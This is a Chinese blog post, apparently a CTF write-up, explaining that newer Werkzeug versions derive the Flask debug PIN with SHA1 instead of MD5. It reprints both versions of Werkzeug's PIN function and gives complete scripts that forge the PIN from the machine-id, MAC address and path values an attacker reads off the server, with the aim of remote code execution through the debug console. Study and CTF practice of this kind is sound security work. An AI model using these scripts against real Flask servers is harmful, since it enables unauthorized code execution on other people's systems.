flask的pin码攻击——新版本下pin码的生成方式

最新推荐文章于 2024-04-23 10:06:07 发布
最新推荐文章于 2024-04-23 10:06:07 发布
阅读量3.7k 收藏 7
点赞数 1
文章标签: 安全 网络安全 flask web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42303523/article/details/124232532
版权

在打*CTF的时候,一道明显是flask的pin码生成进而RCE的题目卡了半天,最后发现是新版本的flask的pin码生成方式有了一定的改变,这里做一下记录。

我们常用的生成pin码的脚本如下:

import hashlib
from itertools import chain
probably_public_bits = [
    'root',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377892354',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '32e48d371198e8420c53b0a1fa37e94d'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

这个脚本实际上改造自flask生成pin码的函数get_pin_and_cookie_name(位于site-packages/werkzeug/debug/__init__.py),其内容如下:

def get_pin_and_cookie_name(app):
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.

    Second item in the resulting tuple is the cookie name for remembering.
    """
    pin = os.environ.get('WERKZEUG_DEBUG_PIN')
    rv = None
    num = None

    # Pin was explicitly disabled
    if pin == 'off':
        return None, None

    # Pin was provided explicitly
    if pin is not None and pin.replace('-', '').isdigit():
        # If there are separators in the pin, return it directly
        if '-' in pin:
            rv = pin
        else:
            num = pin

    modname = getattr(app, '__module__',
                      getattr(app.__class__, '__module__'))

    try:
        # `getpass.getuser()` imports the `pwd` module,
        # which does not exist in the Google App Engine sandbox.
        username = getpass.getuser()
    except ImportError:
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, '__name__', getattr(app.__class__, '__name__')),
        getattr(mod, '__file__', None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [
        str(uuid.getnode()),
        get_machine_id(),
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, text_type):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    cookie_name = '__wzd' + h.hexdigest()[:20]

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                              for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    return rv, cookie_name

而新版本的get_pin_and_cookie_name的内容有了一定的修改:

def get_pin_and_cookie_name(
    app: "WSGIApplication",
) -> t.Union[t.Tuple[str, str], t.Tuple[None, None]]:
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.

    Second item in the resulting tuple is the cookie name for remembering.
    """
    pin = os.environ.get("WERKZEUG_DEBUG_PIN")
    rv = None
    num = None

    # Pin was explicitly disabled
    if pin == "off":
        return None, None

    # Pin was provided explicitly
    if pin is not None and pin.replace("-", "").isdigit():
        # If there are separators in the pin, return it directly
        if "-" in pin:
            rv = pin
        else:
            num = pin

    modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)
    username: t.Optional[str]

    try:
        # getuser imports the pwd module, which does not exist in Google
        # App Engine. It may also raise a KeyError if the UID does not
        # have a username, such as in Docker.
        username = getpass.getuser()
    except (ImportError, KeyError):
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, "__name__", type(app).__name__),
        getattr(mod, "__file__", None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [str(uuid.getnode()), get_machine_id()]

    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")

    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b"pinsalt")
        num = f"{int(h.hexdigest(), 16):09d}"[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = "-".join(
                    num[x : x + group_size].rjust(group_size, "0")
                    for x in range(0, len(num), group_size)
                )
                break
        else:
            rv = num

    return rv, cookie_name

因此,我们生成pin码的脚本也需要进行一定的修改:

import hashlib
from itertools import chain
probably_public_bits = [
    'root',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377892354',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '32e48d371198e8420c53b0a1fa37e94d'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)
lesion__
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
查看Django和flask版本的方法
01-20
查看Django版本 检查是否安装成功,可以在dos下查看Django版本。 1.输入python 2.输入import django 3.输入django.get_version() 查看flask版本 检查是否安装成功,可以在dos下查看flask版本。 1.输入python 2.输入import flask 3.输入flask.__version__ 以上这篇查看Django和flask版本的方法就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持软件开发网。 您可能感兴趣的文章:flask/django 动态查询表
Python-Pickle-RCE-Exploit:具有易受攻击Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或环境中通过加载该字节流来重建它(包括对象的内部结构)(有关更多信息,请参见: -设置易受攻击Flask应用(app.py)- $ virtualenv venv --python = /您的/路径/到/ python $ source venv / bin / activate $ pip安装烧瓶 $烧瓶运行 -利用泡菜RCE(Pickle-PoC.py)- $ python Pickle-PoC.py [URL]
初探flask debug生成pin
m0_62422842的博客
08-22 1206
flask框架pin生成进行初步认识,通过一道ctf题目加深对pin的理解
Flask debug 模式 PIN 生成机制安全性研究笔记
01-01 566
Flask debug 模式 PIN 生成机制安全性研究笔记 0x00 前言 前几天我整理了一个笔记:Flask开启debug模式等于给黑客留了后门,就Flask在生产网络中开启debug模式可能产生的安全问题做了一个简要的分析。其中有一个比较严重的安全问题是,可以在交互式Python shell中执行自定义Python代。就这一点来讲,在旧版...
深入浅出Flask PIN
合天网安学院
08-01 594
最近搞SSTI,发现有的开发开了debug,由此想到了PIN,但一直没有对这个点做一个深入剖析,今天就完整的整理Flask Debug PIN生成原理与安全问题。
flaskpin
weixin_63231007的博客
07-13 2166
python flask-pin介绍 & CTFflask-pin的应用
关于ctfflaskpin总结
arcuied
02-20 2268
flask pin的相关问题
Flask debug 模式生成pin + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 2176
ssti的payload还是不太会写… Flask debug 模式生成pinpin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
2021-02-23
m0_53314778的博客
02-23 307
[GYCTF2020]FlaskApp 知识点 Flask模板注入中debug模式下pin的获取和利用 Pin (代识别) debug模式,为什么assert()在debug模式下才有用? ssti的绕过(拼接字符串,倒序切片,内置对象、函数) WP: 前言:Flask开启debug模式等于给黑客留了后门 参考链接:Flask开启debug模式 Flask在生产环境中开启debug模式是一件非常危险的事,主要有3点原因: 1、会泄露当前报错页面的源,可供审计挖掘其他漏洞 2、会泄露W
python之第三方库flask(一)--初识flask(csdn)————程序.pdf
12-03
python之第三方库flask(一)--初识flask(csdn)————程序
基于Flask框架的小说爬取源实现——Flask_Spider
03-25
项目名称:Flask_Spider - 基于Flask框架的小说爬取平台 技术栈:主要以Python为核心语言,辅以HTML, CSS, Shell, JavaScript等多语言支持。 项目构成:共计52个文件,具体分布如下: - Python源文件(.py):23个...
Python–Flask使用flask-sqlacodegen快速生成model
12-21
Python–Flask使用flask-sqlacodegen快速生成model 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢! 安装依赖 pip3 install flask-...
区块链安全应用----压力测试
2201_76041915的博客
04-17 946
有一个临时的解决方案,进入node_modules/@hyperledger/caliper-fisco-bcos目录,编辑该目录下的package.json文件,在"dependencies"中添加一项"secp256k1": “^3.8.0”,随后在该目录下执行npm i,更新完成后测试程序就能启动了。变动文件二:绿色为新增的代,红色为源代,需要删除。在部署完成后,可以通过。:用于指定需要测试的区块链平台,即受测系统(***S***ystem ***u***nder ***T***est);
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 213
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区,监管,主板,WIFI地址,甚至是颜色,指纹,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 805
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用的安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
浏览器工作原理与实践--安全沙箱:页面和系统之间的隔离墙
echohuangshihuxue的博客
04-17 1028
好了,今天的内容就介绍到这里,下面我来总结下本文的主要内容。首先我们分析了单进程浏览器在系统安全方面的不足,如果浏览器存在漏洞,那么黑客就有机会通过页面对系统发起攻击。因此在设计现代浏览器的体系架构时,就考虑到这个问题了。于是,在多进程的基础之上引入了安全沙箱,有了安全沙箱,就可以将操作系统和渲染进程进行隔离,这样即便渲染进程由于漏洞被攻击,也不会影响到操作系统的。
等保测评三级等保—安全设计思路
2403_84237550的博客
04-18 986
各个环节的防护、检测、响应和恢复等多种安全措施和手段,对系统进行动态的、综合的保护,在攻击。具体操作的安全策略,并在充分利用信息安全基础设施的基础上,构建信息系统的安全技术体系、安全。管理体系,形成集防护、检测、响应、恢复于一体的安全保障体系,从而实现物理安全网络安全、系。动态性,还需要建立安全风险评估机制,在安全风险评估的基础上,调整和完善安全策略,改进安全措。证系统的安全性是一个巨大的挑战,对信息系统划分安全区域,进行层次化、有重点的保护是有保证系。数据的分类确定该区域的安全风险等级。
第67天:APP攻防-Frida反证书抓包&移动安全系统&资产提取&评估扫描
最新发布
weixin_71529930的博客
04-23 911
移动安全框架 (MobSF) 是一种自动化的一体化移动应用程序(Android/iOS/Windows) 渗透测试、恶意软件分析和安全评估框架,能够执行静态和动态分析。AppinfoScanner 一款适用于以 HW 行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态 WEB 站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
flask 保存密到数据库和验证密是否正确
05-25
Flask 是一个 Python Web 开发框架,它提供了丰富的工具和库来帮助我们构建 Web 应用程序。当涉及到保存密到数据库和验证密是否正确时,我们可以使用 Flask 提供的扩展——Flask-Bcrypt。 首先,我们需要安装 Flask-Bcrypt 扩展。可以使用以下命令来安装: ``` pip install flask-bcrypt ``` 接下来,我们可以使用以下代保存密到数据库: ```python from flask import Flask from flask_bcrypt import Bcrypt from flask_sqlalchemy import SQLAlchemy app = Flask(__name__) bcrypt = Bcrypt(app) db = SQLAlchemy(app) class User(db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(20), unique=True, nullable=False) password = db.Column(db.String(60), nullable=False) password = "my_password" hashed_password = bcrypt.generate_password_hash(password).decode('utf-8') user = User(username="my_username", password=hashed_password) db.session.add(user) db.session.commit() ``` 在这个例子中,我们建立了一个名为 `User` 的数据模型,并将密保存为哈希值。使用 `bcrypt.generate_password_hash` 方法可以生成哈希值。这个方法接受密作为输入,并返回哈希值。我们将哈希值保存到数据库中,而不是明文密。 接下来,我们可以使用以下代验证密是否正确: ```python user = User.query.filter_by(username="my_username").first() if user and bcrypt.check_password_hash(user.password, "my_password"): print("Password is correct") else: print("Password is incorrect") ``` 在这个例子中,我们首先查询数据库以获取用户信息。然后,使用 `bcrypt.check_password_hash` 方法检查输入的密是否与数据库中存储的哈希值匹配。如果密匹配,则打印 "Password is correct",否则打印 "Password is incorrect"。 这就是使用 Flask-Bcrypt 在 Flask 中保存密到数据库和验证密是否正确的基本方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值